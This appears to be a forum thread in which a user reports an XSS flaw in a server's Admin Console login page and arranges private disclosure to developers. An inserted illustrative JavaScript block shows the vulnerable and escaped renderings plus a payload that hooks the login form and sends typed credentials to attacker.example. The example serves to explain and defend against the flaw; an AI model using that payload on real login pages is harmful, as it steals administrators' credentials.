XSS in login facility of Admin Console

There is a cross-site scripting security vulnerability in the login page of the Admin Console. I think this is a very sensitive issue to publish here, so could one of the developers please contact me or post an email address to communicate.


Interesting. Have you received any reply from devs?

Though, unless some portal feature is created, I don't see any threats. At least in my case. Only the admin should be logging into it, so my firewall is blocking all other IPs and machines from connecting to it. Well, if you need greater mobility and expose the Admin Console to the internet, then this could be harmful.

Hi Wroot

No, I haven't.

Well, it is not a problem outside-in but inside-out. First, since the XSS is located in the login page, your credentials as administrator can be stolen and sent to a public web site.

Usually firewalls are not configured to block your browser's connections from your computer to the internet. Then that information can be exploited the same way by spyware attached to your IE (in case you use Windows). Anyway, sadly not everybody has a personal firewall installed (I have one too). I'm aware that since the administrative interface is not attached to the Ethernet card but to the loopback interface, this is not a critical issue, but it is still a security leak.
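The "inside-out" path described in the two posts above, as an added example that is not code from this thread or from the project's Admin Console: a login page that reflects a request parameter into its markup, the injected script that hooks the form and beacons the typed credentials outward from the admin's own browser (which an inbound-only firewall or a loopback binding never sees), and the output encoding that neutralizes it. The parameter name `url`, the form markup and the host `attacker.example` are assumptions chosen for the illustration.

```javascript
// Added illustration (not the project's code): reflected XSS in a login page turning into
// credential theft, beside the hardened rendering. The "url" parameter, the markup and
// attacker.example are hypothetical.

// Entity-encode a value for safe insertion into HTML text or a quoted attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Shared template: a login form carrying a post-login redirect target in a hidden field.
function loginForm(urlValue) {
  return [
    '<form method="post" action="/login.jsp">',
    `  <input type="hidden" name="url" value="${urlValue}">`,
    '  <input name="username"><input type="password" name="password">',
    '  <input type="submit" value="Login">',
    '</form>',
  ].join('\n');
}

// Vulnerable: the request parameter is reflected verbatim into the attribute.
function renderLoginVulnerable(params) {
  return loginForm(params.url || '/index.jsp');
}

// Hardened: the same page, with the untrusted value entity-encoded first.
function renderLoginHardened(params) {
  return loginForm(escapeHtml(params.url || '/index.jsp'));
}

// Constructed attacker value. It closes the value="..." attribute, injects a script that hooks
// the form's submit event and sends the typed credentials to the attacker's host via an image
// request, then opens a dummy attribute so the remainder of the original markup still parses.
// The beacon is an outbound request from the admin's browser, so a console bound to loopback
// behind an inbound firewall does not stop it.
const CREDENTIAL_STEALER =
  '"><script>document.forms[0].addEventListener("submit",function(e){' +
  'var f=e.target;(new Image).src="http://attacker.example/c?u="+' +
  'encodeURIComponent(f.username.value)+"&p="+encodeURIComponent(f.password.value);' +
  '});</script><input type="hidden" value="';

// Does an executable <script> element survive rendering?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Inverse of escapeHtml, used to show the encoded value still round-trips, so the hardened
// page keeps working for legitimate redirect targets.
function decodeEntities(s) {
  const map = { '&amp;': '&', '&lt;': '<', '&gt;': '>', '&quot;': '"', '&#39;': "'" };
  return s.replace(/&(amp|lt|gt|quot|#39);/g, (m) => map[m]);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('--- vulnerable page ---\n' + renderLoginVulnerable({ url: CREDENTIAL_STEALER }));
  console.log('--- hardened page ---\n' + renderLoginHardened({ url: CREDENTIAL_STEALER }));
}
```

Running the block prints both renderings: in the vulnerable one the `<script>` element is live markup, in the hardened one it appears as `&lt;script&gt;` inside the attribute value, and a normal redirect target such as `/user-summary.jsp` renders identically in both.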

Well, it is not a problem outside-in but inside-out.

I see now. Well, I think the PC from which I'm connecting to the Admin Console is not likely infected, and I'm not using IE, but if there really is such an issue it should be fixed.

You can try emailing Matt yourself. You can find his email address in his Public Profile.


I don't see your email address, but please feel free to email me directly (address in my profile).

Update: I found the issue as well and am creating a fix now.

Sorry, I didn't get notifications on your posts. Anyway, I'm sending you the info I got for you to confirm.

Regards and thanks

Hello. Sorry to bother you guys again, but this issue is not fixed yet. Please help me get this fixed.

Read my comments at http://www.jivesoftware.org/issues/browse/JM-430

Thanks for following up. I filed this as JM-629.